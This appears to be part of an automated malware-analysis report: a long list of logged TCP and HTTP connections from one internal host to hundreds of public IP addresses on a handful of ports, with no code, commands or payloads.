Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 8443 -> 37178
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 47424 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 47424

Source: global traffic	TCP traffic: 192.168.2.23:35306 -> 205.124.213.207:81
Source: global traffic	TCP traffic: 192.168.2.23:39528 -> 153.229.65.202:5555
Source: global traffic	TCP traffic: 192.168.2.23:41028 -> 6.10.246.119:8080
Source: global traffic	TCP traffic: 192.168.2.23:47876 -> 196.212.110.237:37215
Source: global traffic	TCP traffic: 192.168.2.23:46608 -> 78.233.217.54:8080
Source: global traffic	TCP traffic: 192.168.2.23:41374 -> 173.124.45.94:52869
Source: global traffic	TCP traffic: 192.168.2.23:59080 -> 217.132.116.242:5555
Source: global traffic	TCP traffic: 192.168.2.23:48488 -> 220.50.66.153:8080
Source: global traffic	TCP traffic: 192.168.2.23:58574 -> 68.208.81.105:8080
Source: global traffic	TCP traffic: 192.168.2.23:50322 -> 138.183.57.233:8443
Source: global traffic	TCP traffic: 192.168.2.23:33110 -> 76.69.130.42:8443
Source: global traffic	TCP traffic: 192.168.2.23:43134 -> 159.48.209.196:8080
Source: global traffic	TCP traffic: 192.168.2.23:33008 -> 154.37.153.102:8080
Source: global traffic	TCP traffic: 192.168.2.23:59876 -> 137.50.209.196:5555
Source: global traffic	TCP traffic: 192.168.2.23:49408 -> 170.247.26.46:8080
Source: global traffic	TCP traffic: 192.168.2.23:48922 -> 130.245.77.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:47956 -> 170.248.31.222:37215
Source: global traffic	TCP traffic: 192.168.2.23:43910 -> 68.69.157.29:8443
Source: global traffic	TCP traffic: 192.168.2.23:58090 -> 199.253.175.69:49152
Source: global traffic	TCP traffic: 192.168.2.23:44844 -> 199.240.101.94:52869
Source: global traffic	TCP traffic: 192.168.2.23:35854 -> 33.160.138.35:81
Source: global traffic	TCP traffic: 192.168.2.23:34058 -> 29.14.250.60:5555
Source: global traffic	TCP traffic: 192.168.2.23:54756 -> 173.212.119.218:7574
Source: global traffic	TCP traffic: 192.168.2.23:38088 -> 42.217.20.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:60968 -> 43.190.131.125:5555
Source: global traffic	TCP traffic: 192.168.2.23:37876 -> 50.248.206.34:81
Source: global traffic	TCP traffic: 192.168.2.23:40322 -> 4.143.102.140:8443
Source: global traffic	TCP traffic: 192.168.2.23:36922 -> 27.174.228.124:52869
Source: global traffic	TCP traffic: 192.168.2.23:55106 -> 112.81.89.51:8080
Source: global traffic	TCP traffic: 192.168.2.23:41068 -> 129.241.209.154:8443
Source: global traffic	TCP traffic: 192.168.2.23:49660 -> 68.252.36.133:8080
Source: global traffic	TCP traffic: 192.168.2.23:34462 -> 221.149.172.42:52869
Source: global traffic	TCP traffic: 192.168.2.23:37384 -> 110.152.254.222:81
Source: global traffic	TCP traffic: 192.168.2.23:58442 -> 189.97.112.66:49152
Source: global traffic	TCP traffic: 192.168.2.23:43052 -> 87.235.240.17:8080
Source: global traffic	TCP traffic: 192.168.2.23:51466 -> 201.214.117.34:8080
Source: global traffic	TCP traffic: 192.168.2.23:44722 -> 9.171.24.117:81
Source: global traffic	TCP traffic: 192.168.2.23:41400 -> 186.104.158.59:37215
Source: global traffic	TCP traffic: 192.168.2.23:56728 -> 19.55.75.43:81
Source: global traffic	TCP traffic: 192.168.2.23:37456 -> 162.23.204.195:8080
Source: global traffic	TCP traffic: 192.168.2.23:53214 -> 18.118.102.95:8443
Source: global traffic	TCP traffic: 192.168.2.23:53812 -> 154.64.50.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:60714 -> 215.181.175.56:7574
Source: global traffic	TCP traffic: 192.168.2.23:46184 -> 148.234.153.158:52869
Source: global traffic	TCP traffic: 192.168.2.23:35944 -> 221.22.194.11:52869
Source: global traffic	TCP traffic: 192.168.2.23:45842 -> 19.172.197.250:7574
Source: global traffic	TCP traffic: 192.168.2.23:47804 -> 80.224.60.31:81
Source: global traffic	TCP traffic: 192.168.2.23:38922 -> 132.25.8.225:49152
Source: global traffic	TCP traffic: 192.168.2.23:46864 -> 71.246.136.80:81
Source: global traffic	TCP traffic: 192.168.2.23:39182 -> 61.22.15.228:8080
Source: global traffic	TCP traffic: 192.168.2.23:47472 -> 81.86.140.57:8080
Source: global traffic	TCP traffic: 192.168.2.23:47152 -> 51.187.225.124:37215
Source: global traffic	TCP traffic: 192.168.2.23:45250 -> 50.163.21.160:8080
Source: global traffic	TCP traffic: 192.168.2.23:35128 -> 203.20.194.156:8080
Source: global traffic	TCP traffic: 192.168.2.23:45530 -> 67.131.91.142:8443
Source: global traffic	TCP traffic: 192.168.2.23:60868 -> 193.151.195.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:43540 -> 66.144.204.153:52869
Source: global traffic	TCP traffic: 192.168.2.23:36914 -> 220.30.46.103:7574
Source: global traffic	TCP traffic: 192.168.2.23:60414 -> 9.204.96.218:8443
Source: global traffic	TCP traffic: 192.168.2.23:58752 -> 154.109.129.144:8443
Source: global traffic	TCP traffic: 192.168.2.23:57614 -> 133.36.110.167:81
Source: global traffic	TCP traffic: 192.168.2.23:49518 -> 60.67.161.42:8080
Source: global traffic	TCP traffic: 192.168.2.23:56050 -> 33.104.165.118:49152
Source: global traffic	TCP traffic: 192.168.2.23:58808 -> 46.214.146.214:5555
Source: global traffic	TCP traffic: 192.168.2.23:36150 -> 57.34.192.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:55874 -> 158.188.13.58:8443
Source: global traffic	TCP traffic: 192.168.2.23:37376 -> 93.156.82.165:81
Source: global traffic	TCP traffic: 192.168.2.23:32994 -> 31.105.131.88:5555
Source: global traffic	TCP traffic: 192.168.2.23:59156 -> 37.192.134.201:8080
Source: global traffic	TCP traffic: 192.168.2.23:53758 -> 177.2.102.121:8443
Source: global traffic	TCP traffic: 192.168.2.23:43908 -> 132.128.81.209:8080
Source: global traffic	TCP traffic: 192.168.2.23:42302 -> 205.128.172.162:5555
Source: global traffic	TCP traffic: 192.168.2.23:36700 -> 198.245.112.146:52869
Source: global traffic	TCP traffic: 192.168.2.23:53144 -> 78.253.124.85:7574
Source: global traffic	TCP traffic: 192.168.2.23:47820 -> 149.236.45.199:7574
Source: global traffic	TCP traffic: 192.168.2.23:34936 -> 156.146.166.141:8443
Source: global traffic	TCP traffic: 192.168.2.23:36452 -> 216.116.152.230:5555
Source: global traffic	TCP traffic: 192.168.2.23:56486 -> 166.250.236.222:5555
Source: global traffic	TCP traffic: 192.168.2.23:40030 -> 130.173.40.235:49152
Source: global traffic	TCP traffic: 192.168.2.23:48268 -> 19.104.90.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:60956 -> 149.239.226.86:5555
Source: global traffic	TCP traffic: 192.168.2.23:37686 -> 130.128.52.30:7574
Source: global traffic	TCP traffic: 192.168.2.23:48838 -> 200.6.70.174:7574
Source: global traffic	TCP traffic: 192.168.2.23:50900 -> 178.179.22.112:5555
Source: global traffic	TCP traffic: 192.168.2.23:54014 -> 194.105.25.217:49152
Source: global traffic	TCP traffic: 192.168.2.23:33322 -> 55.108.83.106:8080
Source: global traffic	TCP traffic: 192.168.2.23:57370 -> 41.177.12.142:81
Source: global traffic	TCP traffic: 192.168.2.23:56058 -> 210.214.189.209:8443
Source: global traffic	TCP traffic: 192.168.2.23:56656 -> 194.15.167.91:7574
Source: global traffic	TCP traffic: 192.168.2.23:54374 -> 190.235.119.78:49152
Source: global traffic	TCP traffic: 192.168.2.23:54304 -> 159.31.6.223:81
Source: global traffic	TCP traffic: 192.168.2.23:40030 -> 181.229.62.241:8080
Source: global traffic	TCP traffic: 192.168.2.23:42826 -> 213.73.187.25:8443
Source: global traffic	TCP traffic: 192.168.2.23:43316 -> 43.159.190.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:56400 -> 188.186.154.240:8443
Source: global traffic	TCP traffic: 192.168.2.23:36350 -> 61.118.95.130:5555
Source: global traffic	TCP traffic: 192.168.2.23:44496 -> 42.0.142.75:81
Source: global traffic	TCP traffic: 192.168.2.23:53900 -> 8.80.7.243:8080
Source: global traffic	TCP traffic: 192.168.2.23:43846 -> 217.47.139.128:7574
Source: global traffic	TCP traffic: 192.168.2.23:54718 -> 81.126.102.249:81
Source: global traffic	TCP traffic: 192.168.2.23:44058 -> 209.100.212.31:8080
Source: global traffic	TCP traffic: 192.168.2.23:46060 -> 160.246.43.49:81
Source: global traffic	TCP traffic: 192.168.2.23:44152 -> 208.220.131.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:37958 -> 129.88.172.101:8080
Source: global traffic	TCP traffic: 192.168.2.23:33562 -> 190.36.150.101:49152
Source: global traffic	TCP traffic: 192.168.2.23:43358 -> 212.73.87.107:8080
Source: global traffic	TCP traffic: 192.168.2.23:45292 -> 183.123.30.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:55036 -> 214.222.104.45:37215
Source: global traffic	TCP traffic: 192.168.2.23:53776 -> 47.135.217.171:81
Source: global traffic	TCP traffic: 192.168.2.23:36064 -> 9.31.180.218:52869
Source: global traffic	TCP traffic: 192.168.2.23:48898 -> 63.68.28.146:37215
Source: global traffic	TCP traffic: 192.168.2.23:52826 -> 204.46.18.242:49152
Source: global traffic	TCP traffic: 192.168.2.23:56830 -> 153.49.245.107:8443
Source: global traffic	TCP traffic: 192.168.2.23:36634 -> 167.88.193.6:8080
Source: global traffic	TCP traffic: 192.168.2.23:52812 -> 210.73.128.203:8080
Source: global traffic	TCP traffic: 192.168.2.23:35954 -> 214.223.72.186:49152
Source: global traffic	TCP traffic: 192.168.2.23:50076 -> 118.198.37.98:7574
Source: global traffic	TCP traffic: 192.168.2.23:52152 -> 164.113.140.76:49152
Source: global traffic	TCP traffic: 192.168.2.23:56716 -> 157.219.143.152:52869
Source: global traffic	TCP traffic: 192.168.2.23:38844 -> 210.67.192.146:49152
Source: global traffic	TCP traffic: 192.168.2.23:46812 -> 104.219.63.182:37215
Source: global traffic	TCP traffic: 192.168.2.23:51852 -> 133.47.164.71:7574
Source: global traffic	TCP traffic: 192.168.2.23:38548 -> 73.87.35.147:49152
Source: global traffic	TCP traffic: 192.168.2.23:49718 -> 158.33.63.127:81
Source: global traffic	TCP traffic: 192.168.2.23:34656 -> 102.83.23.37:81
Source: global traffic	TCP traffic: 192.168.2.23:60726 -> 135.17.36.146:8080
Source: global traffic	TCP traffic: 192.168.2.23:47698 -> 53.204.101.143:8080
Source: global traffic	TCP traffic: 192.168.2.23:47096 -> 150.228.174.178:49152
Source: global traffic	TCP traffic: 192.168.2.23:50036 -> 43.193.195.75:8443
Source: global traffic	TCP traffic: 192.168.2.23:46028 -> 112.196.203.8:7574
Source: global traffic	TCP traffic: 192.168.2.23:57330 -> 115.174.174.105:8080
Source: global traffic	TCP traffic: 192.168.2.23:46866 -> 149.192.98.226:8443
Source: global traffic	TCP traffic: 192.168.2.23:42076 -> 163.125.119.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:41602 -> 40.250.29.252:52869
Source: global traffic	TCP traffic: 192.168.2.23:52770 -> 116.182.89.143:49152
Source: global traffic	TCP traffic: 192.168.2.23:39704 -> 155.62.151.67:8080
Source: global traffic	TCP traffic: 192.168.2.23:58638 -> 139.157.78.58:5555
Source: global traffic	TCP traffic: 192.168.2.23:55622 -> 41.2.112.206:81
Source: global traffic	TCP traffic: 192.168.2.23:36804 -> 204.143.178.79:8080
Source: global traffic	TCP traffic: 192.168.2.23:57380 -> 88.80.204.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:39708 -> 207.53.13.164:8080
Source: global traffic	TCP traffic: 192.168.2.23:43474 -> 188.172.6.140:5555
Source: global traffic	TCP traffic: 192.168.2.23:43864 -> 157.231.237.220:8080
Source: global traffic	TCP traffic: 192.168.2.23:60768 -> 106.50.41.89:5555
Source: global traffic	TCP traffic: 192.168.2.23:52376 -> 55.28.208.249:5555
Source: global traffic	TCP traffic: 192.168.2.23:42828 -> 52.68.173.169:52869
Source: global traffic	TCP traffic: 192.168.2.23:48650 -> 168.240.219.165:37215
Source: global traffic	TCP traffic: 192.168.2.23:56096 -> 96.172.77.169:7574
Source: global traffic	TCP traffic: 192.168.2.23:58178 -> 100.166.231.212:8080
Source: global traffic	TCP traffic: 192.168.2.23:41254 -> 33.167.116.217:8443
Source: global traffic	TCP traffic: 192.168.2.23:47110 -> 149.209.199.38:49152
Source: global traffic	TCP traffic: 192.168.2.23:42404 -> 135.15.153.186:49152
Source: global traffic	TCP traffic: 192.168.2.23:45672 -> 212.66.31.87:8080
Source: global traffic	TCP traffic: 192.168.2.23:41590 -> 48.68.104.252:8080
Source: global traffic	TCP traffic: 192.168.2.23:41078 -> 84.231.13.28:52869
Source: global traffic	TCP traffic: 192.168.2.23:46832 -> 48.109.59.80:8080
Source: global traffic	TCP traffic: 192.168.2.23:58590 -> 64.158.29.64:7574
Source: global traffic	TCP traffic: 192.168.2.23:45014 -> 204.162.246.215:5555
Source: global traffic	TCP traffic: 192.168.2.23:36440 -> 115.234.87.185:81
Source: global traffic	TCP traffic: 192.168.2.23:41900 -> 215.85.193.237:7574
Source: global traffic	TCP traffic: 192.168.2.23:38396 -> 173.181.211.215:52869
Source: global traffic	TCP traffic: 192.168.2.23:44708 -> 194.225.60.42:81
Source: global traffic	TCP traffic: 192.168.2.23:49582 -> 161.39.161.182:5555
Source: global traffic	TCP traffic: 192.168.2.23:41984 -> 209.59.13.236:52869
Source: global traffic	TCP traffic: 192.168.2.23:37790 -> 19.155.129.207:81
Source: global traffic	TCP traffic: 192.168.2.23:60320 -> 160.108.162.20:8080
Source: global traffic	TCP traffic: 192.168.2.23:36568 -> 151.186.78.35:8080
Source: global traffic	TCP traffic: 192.168.2.23:60780 -> 124.167.196.122:8080
Source: global traffic	TCP traffic: 192.168.2.23:41078 -> 98.1.76.193:49152
Source: global traffic	TCP traffic: 192.168.2.23:54984 -> 55.79.65.76:8080
Source: global traffic	TCP traffic: 192.168.2.23:48952 -> 37.201.208.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:49900 -> 54.181.148.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:58284 -> 155.60.202.215:81
Source: global traffic	TCP traffic: 192.168.2.23:56762 -> 60.225.44.235:8080
Source: global traffic	TCP traffic: 192.168.2.23:46386 -> 146.118.139.85:52869
Source: global traffic	TCP traffic: 192.168.2.23:36224 -> 170.36.217.232:8080
Source: global traffic	TCP traffic: 192.168.2.23:59392 -> 45.238.205.88:49152
Source: global traffic	TCP traffic: 192.168.2.23:44794 -> 147.44.226.197:7574
Source: global traffic	TCP traffic: 192.168.2.23:60304 -> 4.141.143.218:52869
Source: global traffic	TCP traffic: 192.168.2.23:52358 -> 104.13.41.226:8443
Source: global traffic	TCP traffic: 192.168.2.23:42148 -> 185.144.122.203:8080
Source: global traffic	TCP traffic: 192.168.2.23:48504 -> 28.55.198.211:8080
Source: global traffic	TCP traffic: 192.168.2.23:53422 -> 155.59.7.53:8080
Source: global traffic	TCP traffic: 192.168.2.23:53158 -> 58.196.43.144:8443
Source: global traffic	TCP traffic: 192.168.2.23:44610 -> 73.225.131.194:81
Source: global traffic	TCP traffic: 192.168.2.23:41882 -> 116.64.200.219:8443
Source: global traffic	TCP traffic: 192.168.2.23:45180 -> 53.170.157.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:35318 -> 198.231.208.0:8080
Source: global traffic	TCP traffic: 192.168.2.23:46948 -> 191.56.23.113:8080
Source: global traffic	TCP traffic: 192.168.2.23:36530 -> 175.52.69.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:56396 -> 134.123.74.190:8443
Source: global traffic	TCP traffic: 192.168.2.23:48810 -> 44.223.229.177:8443
Source: global traffic	TCP traffic: 192.168.2.23:51608 -> 168.226.69.113:81
Source: global traffic	TCP traffic: 192.168.2.23:34624 -> 209.37.239.53:8080
Source: global traffic	TCP traffic: 192.168.2.23:52358 -> 69.235.123.21:49152
Source: global traffic	TCP traffic: 192.168.2.23:59252 -> 147.190.48.24:7574
Source: global traffic	TCP traffic: 192.168.2.23:41124 -> 142.44.76.228:7574
Source: global traffic	TCP traffic: 192.168.2.23:33178 -> 159.53.131.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:37362 -> 102.178.177.181:5555
Source: global traffic	TCP traffic: 192.168.2.23:53212 -> 21.39.215.59:81
Source: global traffic	TCP traffic: 192.168.2.23:40242 -> 98.185.128.95:5555
Source: global traffic	TCP traffic: 192.168.2.23:45666 -> 38.56.136.31:52869
Source: global traffic	TCP traffic: 192.168.2.23:36762 -> 80.170.149.84:8443
Source: global traffic	TCP traffic: 192.168.2.23:36702 -> 69.130.148.70:49152
Source: global traffic	TCP traffic: 192.168.2.23:59598 -> 6.81.141.27:8080
Source: global traffic	TCP traffic: 192.168.2.23:59902 -> 25.205.100.246:81
Source: global traffic	TCP traffic: 192.168.2.23:56246 -> 105.114.174.44:7574
Source: global traffic	TCP traffic: 192.168.2.23:33146 -> 85.21.183.18:5555
Source: global traffic	TCP traffic: 192.168.2.23:34962 -> 200.30.182.162:8080
Source: global traffic	TCP traffic: 192.168.2.23:60626 -> 82.72.254.135:52869
Source: global traffic	TCP traffic: 192.168.2.23:39840 -> 193.15.121.211:8080
Source: global traffic	TCP traffic: 192.168.2.23:33400 -> 132.66.136.113:5555
Source: global traffic	TCP traffic: 192.168.2.23:37124 -> 65.146.214.17:8080
Source: global traffic	TCP traffic: 192.168.2.23:54814 -> 1.96.160.227:8443
Source: global traffic	TCP traffic: 192.168.2.23:38728 -> 221.14.154.237:52869
Source: global traffic	TCP traffic: 192.168.2.23:49170 -> 106.207.31.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:49594 -> 17.155.133.186:8080
Source: global traffic	TCP traffic: 192.168.2.23:53268 -> 42.96.155.198:8080
Source: global traffic	TCP traffic: 192.168.2.23:49856 -> 13.179.223.51:7574
Source: global traffic	TCP traffic: 192.168.2.23:49724 -> 156.85.55.226:8080
Source: global traffic	TCP traffic: 192.168.2.23:58876 -> 218.37.29.95:8443
Source: global traffic	TCP traffic: 192.168.2.23:38898 -> 13.114.126.223:7574
Source: global traffic	TCP traffic: 192.168.2.23:37018 -> 30.105.245.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:41886 -> 215.12.30.118:8443
Source: global traffic	TCP traffic: 192.168.2.23:52512 -> 148.61.32.77:8080
Source: global traffic	TCP traffic: 192.168.2.23:54308 -> 162.42.33.248:7574
Source: global traffic	TCP traffic: 192.168.2.23:47790 -> 14.90.236.66:8443
Source: global traffic	TCP traffic: 192.168.2.23:57668 -> 219.15.124.216:81
Source: global traffic	TCP traffic: 192.168.2.23:47442 -> 25.187.113.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:43616 -> 164.97.186.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:47840 -> 45.11.203.66:8080
Source: global traffic	TCP traffic: 192.168.2.23:59078 -> 94.94.0.80:8080
Source: global traffic	TCP traffic: 192.168.2.23:42394 -> 61.49.51.88:5555
Source: global traffic	TCP traffic: 192.168.2.23:47564 -> 131.127.87.223:5555
Source: global traffic	TCP traffic: 192.168.2.23:47500 -> 74.234.73.124:81
Source: global traffic	TCP traffic: 192.168.2.23:40914 -> 217.92.174.104:7574
Source: global traffic	TCP traffic: 192.168.2.23:54538 -> 84.193.104.66:8080
Source: global traffic	TCP traffic: 192.168.2.23:53046 -> 86.84.186.192:52869
Source: global traffic	TCP traffic: 192.168.2.23:42506 -> 108.195.125.48:8443
Source: global traffic	TCP traffic: 192.168.2.23:37400 -> 36.111.14.198:5555
Source: global traffic	TCP traffic: 192.168.2.23:47424 -> 141.226.201.89:8443
Source: global traffic	TCP traffic: 192.168.2.23:34258 -> 105.5.127.26:7574
Source: global traffic	TCP traffic: 192.168.2.23:54214 -> 31.170.238.219:5555
Source: global traffic	TCP traffic: 192.168.2.23:46798 -> 131.140.163.250:8080
Source: global traffic	TCP traffic: 192.168.2.23:46798 -> 155.59.30.234:49152
Source: global traffic	TCP traffic: 192.168.2.23:50428 -> 165.34.185.242:8443
Source: global traffic	TCP traffic: 192.168.2.23:35994 -> 163.251.81.119:8443
Source: global traffic	TCP traffic: 192.168.2.23:42166 -> 193.2.18.134:52869
Source: global traffic	TCP traffic: 192.168.2.23:45056 -> 204.62.24.224:5555
Source: global traffic	TCP traffic: 192.168.2.23:37344 -> 7.90.208.52:8080
Source: global traffic	TCP traffic: 192.168.2.23:36028 -> 148.33.75.74:8443
Source: global traffic	TCP traffic: 192.168.2.23:44194 -> 52.222.67.233:7574
Source: global traffic	TCP traffic: 192.168.2.23:44696 -> 145.40.158.93:49152
Source: global traffic	TCP traffic: 192.168.2.23:50042 -> 118.194.168.68:81
Source: global traffic	TCP traffic: 192.168.2.23:39674 -> 156.228.159.201:49152
Source: global traffic	TCP traffic: 192.168.2.23:46028 -> 33.148.174.72:5555
Source: global traffic	TCP traffic: 192.168.2.23:33236 -> 62.124.228.151:37215
Source: global traffic	TCP traffic: 192.168.2.23:40038 -> 120.128.148.177:8080
Source: global traffic	TCP traffic: 192.168.2.23:33696 -> 220.163.161.225:52869
Source: global traffic	TCP traffic: 192.168.2.23:53012 -> 207.237.147.66:52869
Source: global traffic	TCP traffic: 192.168.2.23:51216 -> 125.224.119.246:37215
Source: global traffic	TCP traffic: 192.168.2.23:48314 -> 205.183.102.146:8443
Source: global traffic	TCP traffic: 192.168.2.23:43272 -> 168.71.141.38:8080
Source: global traffic	TCP traffic: 192.168.2.23:50380 -> 90.50.219.167:7574
Source: global traffic	TCP traffic: 192.168.2.23:50278 -> 200.54.176.233:8080
Source: global traffic	TCP traffic: 192.168.2.23:36458 -> 11.65.199.68:81
Source: global traffic	TCP traffic: 192.168.2.23:58576 -> 169.229.168.20:8080
Source: global traffic	TCP traffic: 192.168.2.23:53690 -> 164.182.234.67:49152
Source: global traffic	TCP traffic: 192.168.2.23:42948 -> 177.52.181.55:52869
Source: global traffic	TCP traffic: 192.168.2.23:57888 -> 176.107.239.103:49152
Source: global traffic	TCP traffic: 192.168.2.23:50330 -> 168.19.18.184:8080
Source: global traffic	TCP traffic: 192.168.2.23:52212 -> 9.115.138.146:52869
Source: global traffic	TCP traffic: 192.168.2.23:44700 -> 154.74.21.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:52934 -> 218.136.34.104:52869
Source: global traffic	TCP traffic: 192.168.2.23:47538 -> 133.1.38.1:7574
Source: global traffic	TCP traffic: 192.168.2.23:49578 -> 82.43.146.188:5555
Source: global traffic	TCP traffic: 192.168.2.23:36116 -> 98.184.232.220:5555
Source: global traffic	TCP traffic: 192.168.2.23:38712 -> 28.28.172.125:8080
Source: global traffic	TCP traffic: 192.168.2.23:58504 -> 215.177.126.237:5555
Source: global traffic	TCP traffic: 192.168.2.23:34626 -> 212.25.172.245:8443
Source: global traffic	TCP traffic: 192.168.2.23:50066 -> 199.151.219.179:8080
Source: global traffic	TCP traffic: 192.168.2.23:41610 -> 215.49.164.139:8080
Source: global traffic	TCP traffic: 192.168.2.23:57000 -> 40.4.221.62:52869
Source: global traffic	TCP traffic: 192.168.2.23:51922 -> 190.10.107.49:49152
Source: global traffic	TCP traffic: 192.168.2.23:55636 -> 211.156.119.221:7574
Source: global traffic	TCP traffic: 192.168.2.23:40906 -> 35.155.60.67:8443
Source: global traffic	TCP traffic: 192.168.2.23:48216 -> 44.63.82.120:8080
Source: global traffic	TCP traffic: 192.168.2.23:54598 -> 216.128.208.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:39634 -> 71.104.240.120:81
Source: global traffic	TCP traffic: 192.168.2.23:51294 -> 18.176.207.149:5555
Source: global traffic	TCP traffic: 192.168.2.23:52544 -> 15.101.151.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:33436 -> 143.108.194.67:8080
Source: global traffic	TCP traffic: 192.168.2.23:55034 -> 144.181.144.68:52869
Source: global traffic	TCP traffic: 192.168.2.23:37802 -> 179.240.110.165:7574
Source: global traffic	TCP traffic: 192.168.2.23:44740 -> 155.228.124.104:8080
Source: global traffic	TCP traffic: 192.168.2.23:60950 -> 63.246.72.186:5555
Source: global traffic	TCP traffic: 192.168.2.23:51486 -> 85.12.92.30:52869
Source: global traffic	TCP traffic: 192.168.2.23:33980 -> 1.221.184.90:8443
Source: global traffic	TCP traffic: 192.168.2.23:56182 -> 5.193.99.233:5555
Source: global traffic	TCP traffic: 192.168.2.23:53406 -> 69.39.1.150:81
Source: global traffic	TCP traffic: 192.168.2.23:35818 -> 19.25.109.75:5555
Source: global traffic	TCP traffic: 192.168.2.23:42418 -> 154.3.70.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:45904 -> 92.64.116.169:8080
Source: global traffic	TCP traffic: 192.168.2.23:40998 -> 37.111.61.238:7574
Source: global traffic	TCP traffic: 192.168.2.23:54178 -> 81.100.132.120:81
Source: global traffic	TCP traffic: 192.168.2.23:59648 -> 178.50.243.15:8080
Source: global traffic	TCP traffic: 192.168.2.23:52468 -> 17.252.58.84:52869
Source: global traffic	TCP traffic: 192.168.2.23:58258 -> 32.6.155.101:8443
Source: global traffic	TCP traffic: 192.168.2.23:53220 -> 153.253.250.183:8080
Source: global traffic	TCP traffic: 192.168.2.23:37116 -> 31.189.179.101:8080
Source: global traffic	TCP traffic: 192.168.2.23:45464 -> 25.215.228.98:52869
Source: global traffic	TCP traffic: 192.168.2.23:38822 -> 211.216.79.68:81
Source: global traffic	TCP traffic: 192.168.2.23:51654 -> 39.94.96.15:8080
Source: global traffic	TCP traffic: 192.168.2.23:46064 -> 71.153.153.217:8080
Source: global traffic	TCP traffic: 192.168.2.23:42498 -> 99.50.2.56:8080
Source: global traffic	TCP traffic: 192.168.2.23:48130 -> 72.173.127.108:52869
Source: global traffic	TCP traffic: 192.168.2.23:53670 -> 201.73.174.30:8080
Source: global traffic	TCP traffic: 192.168.2.23:39728 -> 27.210.106.201:81
Source: global traffic	TCP traffic: 192.168.2.23:35532 -> 19.145.133.190:8443
Source: global traffic	TCP traffic: 192.168.2.23:56036 -> 173.56.116.221:5555
Source: global traffic	TCP traffic: 192.168.2.23:52720 -> 134.155.202.147:81
Source: global traffic	TCP traffic: 192.168.2.23:49654 -> 70.48.69.248:49152
Source: global traffic	TCP traffic: 192.168.2.23:49860 -> 201.111.250.175:8080
Source: global traffic	TCP traffic: 192.168.2.23:33480 -> 129.51.36.251:8443
Source: global traffic	TCP traffic: 192.168.2.23:47696 -> 139.19.220.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:43446 -> 184.222.249.119:8080
Source: global traffic	TCP traffic: 192.168.2.23:43958 -> 24.238.27.240:49152
Source: global traffic	TCP traffic: 192.168.2.23:34530 -> 103.35.248.174:81
Source: global traffic	TCP traffic: 192.168.2.23:43112 -> 9.3.250.91:52869
Source: global traffic	TCP traffic: 192.168.2.23:58036 -> 92.47.126.52:37215
Source: global traffic	TCP traffic: 192.168.2.23:53866 -> 198.210.105.185:8080
Source: global traffic	TCP traffic: 192.168.2.23:41062 -> 95.93.72.253:8080
Source: global traffic	TCP traffic: 192.168.2.23:47794 -> 5.239.244.150:5555
Source: global traffic	TCP traffic: 192.168.2.23:54338 -> 16.191.137.51:49152
Source: global traffic	TCP traffic: 192.168.2.23:39012 -> 213.147.130.22:5555
Source: global traffic	TCP traffic: 192.168.2.23:56796 -> 165.144.62.218:49152
Source: global traffic	TCP traffic: 192.168.2.23:42140 -> 116.15.105.36:49152
Source: global traffic	TCP traffic: 192.168.2.23:44744 -> 191.91.172.135:81
Source: global traffic	TCP traffic: 192.168.2.23:51906 -> 164.203.140.197:8443
Source: global traffic	TCP traffic: 192.168.2.23:42292 -> 183.233.97.199:81
Source: global traffic	TCP traffic: 192.168.2.23:33536 -> 99.75.40.85:5555
Source: global traffic	TCP traffic: 192.168.2.23:50258 -> 143.12.16.95:81
Source: global traffic	TCP traffic: 192.168.2.23:36534 -> 49.134.111.32:81
Source: global traffic	TCP traffic: 192.168.2.23:35398 -> 57.82.230.159:49152
Source: global traffic	TCP traffic: 192.168.2.23:42964 -> 160.103.148.21:8080
Source: global traffic	TCP traffic: 192.168.2.23:46530 -> 3.65.219.187:8080
Source: global traffic	TCP traffic: 192.168.2.23:37748 -> 99.104.23.16:5555
Source: global traffic	TCP traffic: 192.168.2.23:35642 -> 161.90.239.127:81
Source: global traffic	TCP traffic: 192.168.2.23:35932 -> 175.55.189.249:49152
Source: global traffic	TCP traffic: 192.168.2.23:49860 -> 44.10.172.94:8080
Source: global traffic	TCP traffic: 192.168.2.23:34222 -> 58.188.8.201:81
Source: global traffic	TCP traffic: 192.168.2.23:46606 -> 217.240.175.223:8443
Source: global traffic	TCP traffic: 192.168.2.23:43640 -> 150.92.135.209:8443
Source: global traffic	TCP traffic: 192.168.2.23:35866 -> 171.0.70.67:8443
Source: global traffic	TCP traffic: 192.168.2.23:54262 -> 114.141.176.152:8080
Source: global traffic	TCP traffic: 192.168.2.23:60014 -> 158.20.189.8:49152
Source: global traffic	TCP traffic: 192.168.2.23:49684 -> 29.141.33.158:81
Source: global traffic	TCP traffic: 192.168.2.23:43302 -> 93.125.7.219:52869
Source: global traffic	TCP traffic: 192.168.2.23:36810 -> 185.229.210.149:49152
Source: global traffic	TCP traffic: 192.168.2.23:56438 -> 58.209.254.107:8080
Source: global traffic	TCP traffic: 192.168.2.23:54174 -> 11.4.161.251:8080
Source: global traffic	TCP traffic: 192.168.2.23:59508 -> 56.221.62.216:8080
